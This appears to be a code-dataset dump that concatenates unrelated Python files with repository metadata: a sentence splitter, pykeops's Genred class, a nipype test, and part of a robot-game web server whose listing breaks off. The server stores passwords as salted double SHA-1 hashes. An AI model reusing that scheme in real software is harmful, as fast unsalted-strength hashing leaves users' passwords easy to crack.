a_list = [i.strip(' \n ') for i in a_list if re.match(r'^\s*$', i) == None]
text = list_to_text(a_list, 1)
return text.strip(' \n ')
def main(text):
return split_sentence(text)
"""
text = '''
坊市制主要表现为将住宅区(坊)和交易区(市)严格分开,并用法律和制度对交易的时间和地点进行严加控制。坊市制度将商业区和居住区分开,居住区内禁止经商。唐代后期,开始打破市坊制,也不再限制商品交易的时间。
在繁华城市不论白天
还是夜晚,集市贸易都
相当发达。唐代中期,随着农业、手工业的不
断发展,商业出现了新的繁荣局面,单靠白天的市场交换商品显然已不
能适应,于是夜市正式出现。
当时文人的诗作里出现过“夜市千灯照碧云,高楼红袖客纷纷。
水门向晚茶商闹,桥市通宵酒客行。
”
'''
print(split_sentence(text))
"""
| 20.671429
| 100
| 0.574292
|
49996320e67c38315400c72ba8fbad38a6ffb5af
| 16,969
|
py
|
Python
|
pykeops/numpy/generic/generic_red.py
|
kshitij12345/keops
|
fcc6c77bd1caa52787df4e58d76b8bbe94f4f7a1
|
[
"MIT"
] | 1
|
2021-04-20T09:04:21.000Z
|
2021-04-20T09:04:21.000Z
|
pykeops/numpy/generic/generic_red.py
|
kshitij12345/keops
|
fcc6c77bd1caa52787df4e58d76b8bbe94f4f7a1
|
[
"MIT"
] | null | null | null |
pykeops/numpy/generic/generic_red.py
|
kshitij12345/keops
|
fcc6c77bd1caa52787df4e58d76b8bbe94f4f7a1
|
[
"MIT"
] | null | null | null |
import numpy as np
from pykeops.common.get_options import get_tag_backend
from pykeops.common.keops_io import LoadKeOps
from pykeops.common.operations import preprocess, postprocess
from pykeops.common.parse_type import get_sizes, complete_aliases, get_optional_flags
from pykeops.common.utils import axis2cat
from pykeops.numpy import default_dtype
class Genred:
r"""
Creates a new generic operation.
This is KeOps' main function, whose usage is documented in
the :doc:`user-guide <../../Genred>`,
the :doc:`gallery of examples <../../../_auto_examples/index>`
and the :doc:`high-level tutorials <../../../_auto_tutorials/index>`.
Taking as input a handful of strings and integers that specify
a custom Map-Reduce operation, it returns a C++ wrapper
that can be called just like any other NumPy function.
Note:
On top of the **Sum** and **LogSumExp** reductions, KeOps
supports
:ref:`variants of the ArgKMin reduction <part.reduction>`
that can be used
to implement k-nearest neighbor search.
These routines return indices encoded as **floating point numbers**, and
produce no gradient. Fortunately though, you can simply
turn them into ``LongTensors`` and use them to index
your arrays, as showcased in the documentation
of :func:`generic_argmin() <pykeops.numpy.generic_argmin>`, :func:`generic_argkmin() <pykeops.numpy.generic_argkmin>` and in the
:doc:`K-means tutorial <../../../_auto_tutorials/kmeans/plot_kmeans_numpy>`.
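        For instance (an illustrative sketch added here, not part of the original
        docstring), with a k-nearest-neighbor reduction such as
        ``my_knn = Genred('SqDist(x, y)', ['x = Vi(3)', 'y = Vj(3)'], reduction_op='ArgKMin', opt_arg=5, axis=1)``,
        the float-encoded result can be cast before indexing:
        >>> nn_indices = my_knn(x, y).astype(int)  # (M, 5) integer neighbor indices
        >>> neighbors = y[nn_indices]              # gathers the 5 nearest y_j per x_i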
Example:
>>> my_conv = Genred('Exp(-SqNorm2(x - y))', # formula
... ['x = Vi(3)', # 1st input: dim-3 vector per line
... 'y = Vj(3)'], # 2nd input: dim-3 vector per column
... reduction_op='Sum', # we also support LogSumExp, Min, etc.
... axis=1) # reduce along the lines of the kernel matrix
>>> # Apply it to 2d arrays x and y with 3 columns and a (huge) number of lines
>>> x = np.random.randn(1000000, 3)
>>> y = np.random.randn(2000000, 3)
>>> a = my_conv(x, y) # a_i = sum_j exp(-|x_i-y_j|^2)
>>> print(a.shape)
[1000000, 1]
"""
def __init__(
self,
formula,
aliases,
reduction_op="Sum",
axis=0,
dtype=default_dtype,
opt_arg=None,
formula2=None,
cuda_type=None,
dtype_acc="auto",
use_double_acc=False,
sum_scheme="auto",
enable_chunks=True,
optional_flags=[],
rec_multVar_highdim=None,
):
r"""
Instantiate a new generic operation.
Note:
:class:`Genred` relies on C++ or CUDA kernels that are compiled on-the-fly,
and stored in a :ref:`cache directory <part.cache>` as shared libraries (".so" files) for later use.
Args:
formula (string): The scalar- or vector-valued expression
that should be computed and reduced.
The correct syntax is described in the :doc:`documentation <../../Genred>`,
using appropriate :doc:`mathematical operations <../../../api/math-operations>`.
aliases (list of strings): A list of identifiers of the form ``"AL = TYPE(DIM)"``
that specify the categories and dimensions of the input variables. Here:
- ``AL`` is an alphanumerical alias, used in the **formula**.
- ``TYPE`` is a *category*. One of:
- ``Vi``: indexation by :math:`i` along axis 0.
- ``Vj``: indexation by :math:`j` along axis 1.
- ``Pm``: no indexation, the input tensor is a *vector* and not a 2d array.
- ``DIM`` is an integer, the dimension of the current variable.
As described below, :meth:`__call__` will expect as input Tensors whose
shape are compatible with **aliases**.
Keyword Args:
reduction_op (string, default = ``"Sum"``): Specifies the reduction
operation that is applied to reduce the values
of ``formula(x_i, y_j, ...)`` along axis 0 or axis 1.
The supported values are one of :ref:`part.reduction`
axis (int, default = 0): Specifies the dimension of the "kernel matrix" that is reduced by our routine.
The supported values are:
- **axis** = 0: reduction with respect to :math:`i`, outputs a ``Vj`` or ":math:`j`" variable.
- **axis** = 1: reduction with respect to :math:`j`, outputs a ``Vi`` or ":math:`i`" variable.
dtype (string, default = ``"float64"``): Specifies the numerical ``dtype`` of the input and output arrays.
The supported values are:
- **dtype** = ``"float32"``.
- **dtype** = ``"float64"``.
opt_arg (int, default = None): If **reduction_op** is in ``["KMin", "ArgKMin", "KMinArgKMin"]``,
this argument allows you to specify the number ``K`` of neighbors to consider.
dtype_acc (string, default ``"auto"``): type for accumulator of reduction, before casting to dtype.
It improves the accuracy of results in case of large sized data, but is slower.
Default value "auto" will set this option to the value of dtype. The supported values are:
- **dtype_acc** = ``"float16"`` : allowed only if dtype is "float16".
- **dtype_acc** = ``"float32"`` : allowed only if dtype is "float16" or "float32".
- **dtype_acc** = ``"float64"`` : allowed only if dtype is "float32" or "float64"..
use_double_acc (bool, default False): same as setting dtype_acc="float64" (only one of the two options can be set)
If True, accumulate results of reduction in float64 variables, before casting to float32.
This can only be set to True when data is in float32 or float64.
It improves the accuracy of results in case of large sized data, but is slower.
sum_scheme (string, default ``"auto"``): method used to sum up results for reductions. This option may be changed only
when reduction_op is one of: "Sum", "MaxSumShiftExp", "LogSumExp", "Max_SumShiftExpWeight", "LogSumExpWeight", "SumSoftMaxWeight".
Default value "auto" will set this option to "block_red" for these reductions. Possible values are:
- **sum_scheme** = ``"direct_sum"``: direct summation
- **sum_scheme** = ``"block_sum"``: use an intermediate accumulator in each block before accumulating in the output. This improves accuracy for large sized data.
- **sum_scheme** = ``"kahan_scheme"``: use Kahan summation algorithm to compensate for round-off errors. This improves
accuracy for large sized data.
enable_chunks (bool, default True): enable automatic selection of special "chunked" computation mode for accelerating reductions
with formulas involving large dimension variables.
optional_flags (list, default []): further optional flags passed to the compiler, in the form ['-D...=...','-D...=...']
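Example:
A minimal sketch (purely illustrative -- the option values below are an
assumption chosen for the example, not a recommendation) combining the
accuracy-related options documented above:
>>> my_conv = Genred('Exp(-SqNorm2(x - y))',
...                  ['x = Vi(3)', 'y = Vj(3)'],
...                  reduction_op='Sum',
...                  axis=1,
...                  dtype='float32',
...                  dtype_acc='float64',     # accumulate in double precision
...                  sum_scheme='block_sum')  # block-wise accumulation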
"""
if cuda_type:
# cuda_type is just old keyword for dtype, so this is just a trick to keep backward compatibility
dtype = cuda_type
if dtype in ("float16", "half"):
raise ValueError(
"[KeOps] Float16 type is only supported with PyTorch tensors inputs."
)
self.reduction_op = reduction_op
reduction_op_internal, formula2 = preprocess(reduction_op, formula2)
if rec_multVar_highdim is not None:
optional_flags += ["-DMULT_VAR_HIGHDIM=1"]
self.optional_flags = optional_flags + get_optional_flags(
reduction_op_internal,
dtype_acc,
use_double_acc,
sum_scheme,
dtype,
enable_chunks,
)
str_opt_arg = "," + str(opt_arg) if opt_arg else ""
str_formula2 = "," + formula2 if formula2 else ""
self.formula = (
reduction_op_internal
+ "_Reduction("
+ formula
+ str_opt_arg
+ ","
+ str(axis2cat(axis))
+ str_formula2
+ ")"
)
self.aliases = complete_aliases(self.formula, aliases)
self.dtype = dtype
self.myconv = LoadKeOps(
self.formula, self.aliases, self.dtype, "numpy", self.optional_flags
).import_module()
self.axis = axis
self.opt_arg = opt_arg
def __call__(self, *args, backend="auto", device_id=-1, ranges=None):
r"""
Apply the routine on arbitrary NumPy arrays.
.. warning::
Even for variables of size 1 (e.g. :math:`a_i\in\mathbb{R}`
for :math:`i\in[0,M)`), KeOps expects inputs to be formatted
as 2d Tensors of size ``(M,dim)``. In practice,
``a.reshape(-1,1)`` should be used to turn a vector of weights
into a *list of scalar values*.
Args:
*args (2d arrays (variables ``Vi(..)``, ``Vj(..)``) and 1d arrays (parameters ``Pm(..)``)): The input numerical arrays,
which should all have the same ``dtype``, be **contiguous** and be stored on
the **same device**. KeOps expects one array per alias,
with the following compatibility rules:
- All ``Vi(Dim_k)`` variables are encoded as **2d-arrays** with ``Dim_k`` columns and the same number of lines :math:`M`.
- All ``Vj(Dim_k)`` variables are encoded as **2d-arrays** with ``Dim_k`` columns and the same number of lines :math:`N`.
- All ``Pm(Dim_k)`` variables are encoded as **1d-arrays** (vectors) of size ``Dim_k``.
Keyword Args:
backend (string): Specifies the map-reduce scheme.
The supported values are:
- ``"auto"`` (default): let KeOps decide which backend is best suited to your data, based on the tensors' shapes. ``"GPU_1D"`` will be chosen in most cases.
- ``"CPU"``: use a simple C++ ``for`` loop on a single CPU core.
- ``"GPU_1D"``: use a `simple multithreading scheme <https://github.com/getkeops/keops/blob/master/keops/core/GpuConv1D.cu>`_ on the GPU - basically, one thread per value of the output index.
- ``"GPU_2D"``: use a more sophisticated `2D parallelization scheme <https://github.com/getkeops/keops/blob/master/keops/core/GpuConv2D.cu>`_ on the GPU.
- ``"GPU"``: let KeOps decide which one of the ``"GPU_1D"`` or the ``"GPU_2D"`` scheme will run faster on the given input.
device_id (int, default=-1): Specifies the GPU that should be used
to perform the computation; a negative value lets your system
choose the default GPU. This parameter is only useful if your
system has access to several GPUs.
ranges (6-uple of integer arrays, None by default):
Ranges of integers that specify a
:doc:`block-sparse reduction scheme <../../sparsity>`
with *Mc clusters along axis 0* and *Nc clusters along axis 1*.
If None (default), we simply loop over all indices
:math:`i\in[0,M)` and :math:`j\in[0,N)`.
**The first three ranges** will be used if **axis** = 1
(reduction along the axis of ":math:`j` variables"),
and to compute gradients with respect to ``Vi(..)`` variables:
- ``ranges_i``, (Mc,2) integer array - slice indices
:math:`[\operatorname{start}^I_k,\operatorname{end}^I_k)` in :math:`[0,M]`
that specify our Mc blocks along the axis 0
of ":math:`i` variables".
- ``slices_i``, (Mc,) integer array - consecutive slice indices
:math:`[\operatorname{end}^S_1, ..., \operatorname{end}^S_{M_c}]`
that specify Mc ranges :math:`[\operatorname{start}^S_k,\operatorname{end}^S_k)` in ``redranges_j``,
with :math:`\operatorname{start}^S_k = \operatorname{end}^S_{k-1}`.
**The first 0 is implicit**, meaning that :math:`\operatorname{start}^S_0 = 0`, and we typically expect that
``slices_i[-1] == len(redranges_j)``.
- ``redranges_j``, (Mcc,2) integer array - slice indices
:math:`[\operatorname{start}^J_\ell,\operatorname{end}^J_\ell)` in :math:`[0,N]`
that specify reduction ranges along the axis 1
of ":math:`j` variables".
If **axis** = 1, these integer arrays allow us to say that ``for k in range(Mc)``, the output values for
indices ``i in range( ranges_i[k,0], ranges_i[k,1] )`` should be computed using a Map-Reduce scheme over
indices ``j in Union( range( redranges_j[l, 0], redranges_j[l, 1] ))`` for ``l in range( slices_i[k-1], slices_i[k] )``.
**Likewise, the last three ranges** will be used if **axis** = 0
(reduction along the axis of ":math:`i` variables"),
and to compute gradients with respect to ``Vj(..)`` variables:
- ``ranges_j``, (Nc,2) integer array - slice indices
:math:`[\operatorname{start}^J_k,\operatorname{end}^J_k)` in :math:`[0,N]`
that specify our Nc blocks along the axis 1
of ":math:`j` variables".
- ``slices_j``, (Nc,) integer array - consecutive slice indices
:math:`[\operatorname{end}^S_1, ..., \operatorname{end}^S_{N_c}]`
that specify Nc ranges :math:`[\operatorname{start}^S_k,\operatorname{end}^S_k)` in ``redranges_i``,
with :math:`\operatorname{start}^S_k = \operatorname{end}^S_{k-1}`.
**The first 0 is implicit**, meaning that :math:`\operatorname{start}^S_0 = 0`, and we typically expect that
``slices_j[-1] == len(redranges_i)``.
- ``redranges_i``, (Ncc,2) integer array - slice indices
:math:`[\operatorname{start}^I_\ell,\operatorname{end}^I_\ell)` in :math:`[0,M]`
that specify reduction ranges along the axis 0
of ":math:`i` variables".
If **axis** = 0,
these integer arrays allow us to say that ``for k in range(Nc)``, the output values for
indices ``j in range( ranges_j[k,0], ranges_j[k,1] )`` should be computed using a Map-Reduce scheme over
indices ``i in Union( range( redranges_i[l, 0], redranges_i[l, 1] ))`` for ``l in range( slices_j[k-1], slices_j[k] )``.
Returns:
(M,D) or (N,D) array:
The output of the reduction,
a **2d-tensor** with :math:`M` or :math:`N` lines (if **axis** = 1
or **axis** = 0, respectively) and a number of columns
that is inferred from the **formula**.
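Example:
An illustrative block-sparse call (the cluster boundaries are arbitrary and
the ``int32`` dtype of the range arrays is an assumption about what the
underlying C++ routines expect):
>>> x = np.random.randn(100, 3)
>>> y = np.random.randn(200, 3)
>>> a_dense = my_conv(x, y, backend='CPU')   # plain reduction on the CPU
>>> # With axis=1, rows [0,50) only interact with columns [0,120),
>>> # and rows [50,100) with columns [120,200):
>>> ranges_i    = np.array([[0, 50], [50, 100]], dtype=np.int32)
>>> slices_i    = np.array([1, 2], dtype=np.int32)
>>> redranges_j = np.array([[0, 120], [120, 200]], dtype=np.int32)
>>> ranges_j    = np.array([[0, 120], [120, 200]], dtype=np.int32)
>>> slices_j    = np.array([1, 2], dtype=np.int32)
>>> redranges_i = np.array([[0, 50], [50, 100]], dtype=np.int32)
>>> a_sparse = my_conv(x, y, ranges=(ranges_i, slices_i, redranges_j,
...                                  ranges_j, slices_j, redranges_i))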
"""
# Get tags
tagCpuGpu, tag1D2D, _ = get_tag_backend(backend, args)
if ranges is None:
ranges = () # To keep the same type
# N.B.: KeOps C++ expects contiguous integer arrays as ranges
ranges = tuple(np.ascontiguousarray(r) for r in ranges)
nx, ny = get_sizes(self.aliases, *args)
nout, nred = (nx, ny) if self.axis == 1 else (ny, nx)
if "Arg" in self.reduction_op:
# when using Arg type reductions,
# if nred is greater than 16 million and dtype=float32, the result is not reliable
# because we encode indices as floats, so we raise an exception;
# same with float16 type and nred>2048
if nred > 1.6e7 and self.dtype in ("float32", "float"):
raise ValueError(
"size of input array is too large for Arg type reduction with single precision. Use double precision."
)
elif nred > 2048 and self.dtype in ("float16", "half"):
raise ValueError(
"size of input array is too large for Arg type reduction with float16 dtype.."
)
out = self.myconv.genred_numpy(tagCpuGpu, tag1D2D, 0, device_id, ranges, *args)
return postprocess(
out, "numpy", self.reduction_op, nout, self.opt_arg, self.dtype
)
| 53.361635
| 211
| 0.573399
|
eeaef555627bd5bd522f125d985f7cd6bdc4e40e
| 1,714
|
py
|
Python
|
nipype/interfaces/afni/tests/test_auto_MaskTool.py
|
mfalkiewicz/nipype
|
775e21b78fb1ffa2ff9cb12e6f052868bd44d052
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/afni/tests/test_auto_MaskTool.py
|
mfalkiewicz/nipype
|
775e21b78fb1ffa2ff9cb12e6f052868bd44d052
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/afni/tests/test_auto_MaskTool.py
|
mfalkiewicz/nipype
|
775e21b78fb1ffa2ff9cb12e6f052868bd44d052
|
[
"Apache-2.0"
] | null | null | null |
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..utils import MaskTool
def test_MaskTool_inputs():
input_map = dict(args=dict(argstr='%s',
),
count=dict(argstr='-count',
position=2,
),
datum=dict(argstr='-datum %s',
),
dilate_inputs=dict(argstr='-dilate_inputs %s',
),
dilate_results=dict(argstr='-dilate_results %s',
),
environ=dict(nohash=True,
usedefault=True,
),
fill_dirs=dict(argstr='-fill_dirs %s',
requires=['fill_holes'],
),
fill_holes=dict(argstr='-fill_holes',
),
frac=dict(argstr='-frac %s',
),
ignore_exception=dict(deprecated='1.0.0',
nohash=True,
usedefault=True,
),
in_file=dict(argstr='-input %s',
copyfile=False,
mandatory=True,
position=-1,
),
inter=dict(argstr='-inter',
),
num_threads=dict(nohash=True,
usedefault=True,
),
out_file=dict(argstr='-prefix %s',
name_source='in_file',
name_template='%s_mask',
),
outputtype=dict(),
terminal_output=dict(deprecated='1.0.0',
nohash=True,
),
union=dict(argstr='-union',
),
verbose=dict(argstr='-verb %s',
),
)
inputs = MaskTool.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_MaskTool_outputs():
output_map = dict(out_file=dict(),
)
outputs = MaskTool.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
| 24.485714
| 67
| 0.618436
|
cbc383eea911c2da864498f8e92406f3e08963ca
| 50,282
|
py
|
Python
|
server.py
|
aurickq/rgserver
|
f391a686c4056ab2568cce4b8fbe31e81797ce80
|
[
"MIT"
] | null | null | null |
server.py
|
aurickq/rgserver
|
f391a686c4056ab2568cce4b8fbe31e81797ce80
|
[
"MIT"
] | null | null | null |
server.py
|
aurickq/rgserver
|
f391a686c4056ab2568cce4b8fbe31e81797ce80
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import ast
import difflib
import hashlib
import json
import math
import os
import py_compile
import random
import re
import string
import subprocess
import sys
import time
import urllib
import urlparse
import web
import web.form
import pygments
import pygments.lexers
import pygments.lexers.text
import pygments.formatters
import dbcon
import matchstate as ms
import shorten
import tools
import tplib
from rgkit.settings import settings
web.config.debug = False
CHALLENGES_LIMITS = 25
ROBOTS_LIMITS = 3
MAX_NAME_LENGTH = 25
BOT_LIMIT_REACHED_MSG = '''
Currently you can have at most {0} active robots. Disabling old bots will
allow you to create new ones. Otherwise, please create a post in the Requests
board of our community to increase your limit. It's
very easy, please don't abuse the simple registration system and
create multiple users.'''
urls = (
'/viewrobot/(\d*)', 'PageRedirectViewRobot',
'/viewuser/(\d*)', 'PageRedirectViewUser',
'/robotsource/(\d*)', 'PageRedirectRobotSource',
'/', 'PageHome',
'/directory', 'PageDirectory',
'/home', 'PageHome',
'/login', 'PageLogin',
'/logout', 'PageLogout',
'/matchlist', 'PageMatchList',
'/match/(\d*)', 'PageMatch',
'/moderate', 'PageModerate',
'/moderate/(\d*)', 'PageModerate',
'/profile/edit', 'PageProfile',
'/reg', 'PageRegister',
'/robots', 'PageRobots',
'/robot/(\d*)', 'PageViewRobot',
'/robot/(\d*)/against/(\d*)', 'PageRobotHistory',
'/robot/(\d*)/challenge', 'PageChallengeRobot',
'/robot/(\d*)/challenge/(\d*)', 'PageChallengeRobot',
'/robot/(\d*)/challenge/(\d*)/(\d*)', 'PageChallengeRobot',
'/robot/(\d*)/charts', 'PageRobotCharts',
'/robot/(\d*)/delete', 'PageDeleteRobot',
'/robot/(\d*)/disable', 'PageDisableRobot',
'/robot/(\d*)/history', 'PageRobotHistory',
'/robot/(\d*)/(edit)', 'PageEditRobot',
'/robot/(\d*)/edit/mode/(normal)', 'PageSwitchEditMode',
'/robot/(\d*)/edit/mode/(vim)', 'PageSwitchEditMode',
'/robot/(\d*)/edit/(vim)', 'PageEditRobot',
'/robot/(\d*)/enable', 'PageEnableRobot',
'/robot/(\d*)/source', 'PageRobotSource',
'/robot/(\d*)/test', 'PageRobotTest',
'/robot/new', 'PageNewRobot',
'/robot/new(acc)', 'PageNewRobot',
'/robot/stats', 'PageRobotStats',
'/stats', 'PageStats',
'/update/prefs', 'PageUpdatePrefs',
'/user/(\d*)', 'PageViewUser',
# static pages
'/(api)', 'PageStatic',
'/(compdir)', 'PageStatic',
'/(credits)', 'PageStatic',
'/(email)', 'PageStatic',
'/(faq)', 'PageStatic',
'/(gettingstarted)', 'PageStatic',
'/(kit)', 'PageStatic',
'/(moreexamples)', 'PageStatic',
'/(namerules)', 'PageStatic',
'/(rgdocs)', 'PageStatic',
'/(rules)', 'PageStatic',
'/(security)', 'PageStatic',
)
app = web.application(urls, globals())
def debuggable_session(app):
if web.config.get('_sess') is None:
sess = web.session.Session(app, web.session.DiskStore('sessions'))
web.config._sess = sess
return sess
return web.config._sess
sess = debuggable_session(app)
def hash(data):
return hashlib.sha1(data).hexdigest()
def generate_salt(length=10):
random.seed()
pool = string.ascii_uppercase + string.ascii_lowercase + string.digits
return ''.join(random.choice(pool) for i in range(length))
def logged_in(sess):
if 'logged_in' in sess:
if sess.logged_in:
if sess.user_id:
db.update('users', where='id=$id', vars={'id': sess.user_id},
last_active=int(time.time()))
# Change this to manual swap when added
db.update('robots', where='user_id=$id',
vars={'id': sess.user_id}, automatch=True)
return sess.user_id
return False
def force_login(sess, page='/reg', check_logged_in=False):
user_id = logged_in(sess)
if check_logged_in:
# Redirect if logged in
if user_id:
raise web.seeother(page)
else:
# Redirect if not logged in
if not user_id:
raise web.seeother(page)
return user_id
def username_exists(username):
result = db.select('users',
what='1',
where='username=$username',
vars={'username': username},
limit=1)
return bool(result)
def create_user(username, password, **params):
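# The stored credential is hash(hash(password) + salt): the password is hashed,
# a random salt is appended, and the result is hashed again, so only the final
# digest and the salt are persisted (authenticate_user repeats the same steps).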
pw_hash = hash(password)
pw_salt = generate_salt()
pw_hash = hash(pw_hash+pw_salt)
return db.insert('users', username=username, pw_hash=pw_hash, pw_salt=pw_salt, **params)
def authenticate_user(username, password):
users = db.select('users', where='username = $username', vars={'username': username},
what='id, pw_hash, pw_salt')
if not users:
return False
user = users[0]
if hash(hash(password) + user['pw_salt']) == user['pw_hash']:
return user['id']
return False
def login_user(sess, user_id):
if logged_in(sess):
return False
sess.logged_in = True
sess.user_id = user_id
return True
def logout_user(sess):
sess.kill()
def template_closure(directory):
global settings
templates = web.template.render(
directory,
globals={
'sess': sess,
'settings': settings,
'tplib': tplib,
},
)
def render(name, *params, **kwargs):
return getattr(templates, name)(*params, **kwargs)
return render
tpl = template_closure('t/')
def ltpl(*params, **kwargs):
return tpl('layout', tpl(*params, **kwargs))
def lmsg(msg):
return tpl('layout', '<div class="prose">{0}</div>'.format(msg))
db = dbcon.connect_db()
######################
def encode_history_json(hist):
hist = json.dumps(hist)
hist = 'replay_callback({0});'.format(hist)
return hist.encode('base64')
def get_match_data(mid):
history_data = db.select('history', what='data', where='match_id=$id',
vars={'id': mid})
if history_data:
data = history_data[0]['data']
if data:
data = shorten.loads(data)
data['history'] = encode_history_json(data['history'])
return data
return None
def get_last_matches(num, min_rating=None):
mr = ''
if min_rating:
mr = ' and r1.rating >= $r and r2.rating >= $r'
query = '''
select
matches.*,
r1.compiled_code as r1_code, r2.compiled_code as r2_code,
r1.name as r1_name, r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where state = {0} {1}
order by timestamp desc
limit $num'''.format(ms.DONE, mr)
matches = db.query(query, vars={'num': num, 'r': min_rating})
return matches if matches else None
def get_latest_match(min_rating=None):
matches = get_last_matches(1, min_rating)
if matches:
return matches[0]
return None
class PageHome:
def GET(self):
if logged_in(sess):
return ltpl('home')
rating = 3000.0
match = get_latest_match(rating)
if match:
match.data = get_match_data(match['id'])
recent = get_last_matches(5, rating)
return ltpl('home', match, recent)
class PageLogin:
_form = web.form.Form(
web.form.Textbox('username', description='Username'),
web.form.Password('password', description='Password'),
web.form.Button('Login')
)
def GET(self):
force_login(sess, '/robots', True)
form = self._form()
return ltpl('login', form)
def POST(self):
form = self._form()
if not form.validates():
return 'bad input'
if not form.d.username or not form.d.password:
return 'you have to enter a username and password'
user_id = authenticate_user(form.d.username, form.d.password)
if not user_id:
return 'couldn\'t authenticate user'
login_user(sess, user_id)
raise web.seeother('/robots')
class PageRegister:
_form = web.form.Form(
web.form.Textbox('username', description='Username'),
web.form.Password('password', description='Password'),
web.form.Button('Register')
)
def GET(self):
force_login(sess, '/robots', True)
form = self._form()
return ltpl('reg', form)
def POST(self):
form = self._form()
if not form.validates():
return 'bad input'
if not form.d.username or not form.d.password:
return 'you have to enter a username and password'
if username_exists(form.d.username):
return 'username already exists'
user_id = create_user(form.d.username, form.d.password)
if not user_id:
return 'couldn\'t create user'
login_user(sess, user_id)
raise web.seeother('/robot/new')
class PageLogout:
def GET(self):
logout_user(sess)
raise web.seeother('/')
class PageRobots:
def GET(self):
force_login(sess)
query = '''
select *,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
where user_id = $user_id and not deleted and
disabled = $disabled
order by rating desc nulls last'''
robots = db.query(
query, vars={'user_id': sess.user_id, 'disabled': False})
disabled_robots = db.query(
query, vars={'user_id': sess.user_id, 'disabled': True})
return ltpl('robots', robots, disabled_robots)
def check_name(s):
for ch in s:
if ch in string.printable and ch not in string.whitespace:
return True
return False
def count_robots(user_id):
result = db.select(
'robots', what='count(*)',
where='user_id=$user_id and not disabled',
vars={'user_id': user_id})
return result[0]['count'] if result else None
class PageNewRobot:
_form = web.form.Form(
web.form.Textbox('name'))
def GET(self, new_acc=None):
force_login(sess)
robot_count = count_robots(sess.user_id)
user = db.select('users', what='extra_bots', where='id=$id',
vars={'id': sess.user_id})
robot_limit = ROBOTS_LIMITS
if user:
robot_limit += user[0]['extra_bots']
if robot_count >= robot_limit:
return lmsg(BOT_LIMIT_REACHED_MSG.format(robot_limit))
top_robots = list(db.select('robots',
what='id, name, rating, open_source',
where='compiled and passed and not disabled and rating is not NULL',
order='rating desc',
limit=6))
return ltpl('newrobot', bool(new_acc), top_robots)
def POST(self, new_acc=None):
force_login(sess)
robot_count = count_robots(sess.user_id)
user = db.select('users', what='extra_bots', where='id=$id',
vars={'id': sess.user_id})
robot_limit = ROBOTS_LIMITS
if user:
robot_limit += user[0]['extra_bots']
if robot_count >= robot_limit:
return lmsg(BOT_LIMIT_REACHED_MSG.format(robot_limit))
form = self._form()
if not form.validates():
return 'bad input'
form.d.name = form.d.name.strip()
if not form.d.name:
return lmsg('You have to enter a name.')
if not check_name(form.d.name):
return lmsg('Please have at least one printable, non-whitespace ASCII character in your name.')
if len(form.d.name) > MAX_NAME_LENGTH:
return lmsg(
'Please limit your name to {0} characters.'.format(
MAX_NAME_LENGTH))
code = '''import rg
class Robot:
def act(self, game):
# return something
pass'''
rid = db.insert('robots',
user_id=sess.user_id,
name=form.d.name,
code=code)
raise web.seeother('/robot/{0}/edit'.format(rid))
def get_robot(rid, check_user_id=True):
where = 'id=$id'
vars = {'id': rid}
if check_user_id and not tplib.is_admin(sess):
where += ' and user_id=$user_id'
vars['user_id'] = sess.user_id
result = db.select('robots', where=where, vars=vars)
return result[0] if result else None
class PageSwitchEditMode:
def GET(self, rid, edit_mode):
if edit_mode == 'vim':
web.setcookie('vim', 'yes', 480984220)
raise web.seeother('/robot/' + rid + '/edit/vim')
web.setcookie('vim', 'no', -1)
raise web.seeother('/robot/' + rid + '/edit')
class PageEditRobot:
_form = web.form.Form(
web.form.Textbox('name'),
web.form.Textarea('code'),
web.form.Checkbox('open_source'),
web.form.Button('save'))
def first_time(self):
result = db.select('robots',
what='count(*)',
where='compiled and user_id = $user_id',
vars={'user_id': sess.user_id})
if result and result[0]['count'] == 0:
return True
user = db.select('users',
what='registered_on',
where='id = $id',
vars={'id': sess.user_id})
if user and time.time() - user[0]['registered_on'] < tools.DAY:
return True
return False
def GET(self, rid, edit_mode):
force_login(sess)
vim_cookie = web.cookies().get('vim')
if vim_cookie == 'yes' and edit_mode != 'vim':
raise web.seeother('/robot/' + rid + '/edit/vim')
if vim_cookie == 'no' and edit_mode == 'vim':
raise web.seeother('/robot/' + rid + '/edit')
rid = int(rid)
robot = get_robot(rid)
if not robot:
return lmsg('That robot does not exist.')
first = self.first_time()
db.update('robots',
where='id=$id',
vars={'id': rid},
saved=False)
return ltpl('editrobot', robot, edit_mode == 'vim', first)
def POST(self, rid, edit_mode):
force_login(sess)
rid = int(rid)
robot = get_robot(rid)
if not robot:
return lmsg('Robot does not exist.')
form = self._form(robot)
if not form.validates():
return lmsg('Bad input.')
form.d.name = form.d.name.strip()
if not form.d.name:
return lmsg('You have to enter a name.')
if not check_name(form.d.name):
return lmsg('Please have at least one printable and ' +
'non-whitespace ASCII character in your name.')
if len(form.d.name) > MAX_NAME_LENGTH:
return lmsg(
'Please limit your name to {0} characters.'.format(
MAX_NAME_LENGTH))
if len(form.d.code) > 250000:
return lmsg('Please limit your code to 250,000 characters.')
robot_code = form.d.code
db.update('robots',
where='id=$id',
vars={'id': rid},
name=form.d.name,
code=robot_code,
open_source=form.d.open_source)
robot = get_robot(rid)
if not robot:
return lmsg('Robot does not exist.')
compiled_code = robot_code
if robot.rating is not None:
rating = robot.rating
else:
rating = settings.default_rating
db.update('robots',
where='id=$id',
vars={'id': rid},
last_updated=int(time.time()),
last_rating=rating,
compiled_code=compiled_code,
changed_since_sbtest=True,
saved=True,
passed=True,
compiled=True)
raise web.seeother('/robot/{0}/edit'.format(robot.id))
MATCHES_PER_PAGE = 20
class PageRedirectViewRobot:
def GET(self, rid):
raise web.redirect('/robot/{0}'.format(rid))
class PageRedirectViewUser:
def GET(self, uid):
raise web.redirect('/user/{0}'.format(uid))
class PageRedirectRobotSource:
def GET(self, rid):
raise web.redirect('/robot/{0}/source'.format(rid))
class PageViewRobot:
def get_robot(self, rid):
query = '''
select
robots.id, user_id, name, disabled, last_updated, deleted,
rating, users.about, open_source, priority, time,
length(compiled_code) as len, fast, short, winrate, automatch,
(select count(*) from robots r where compiled and passed and
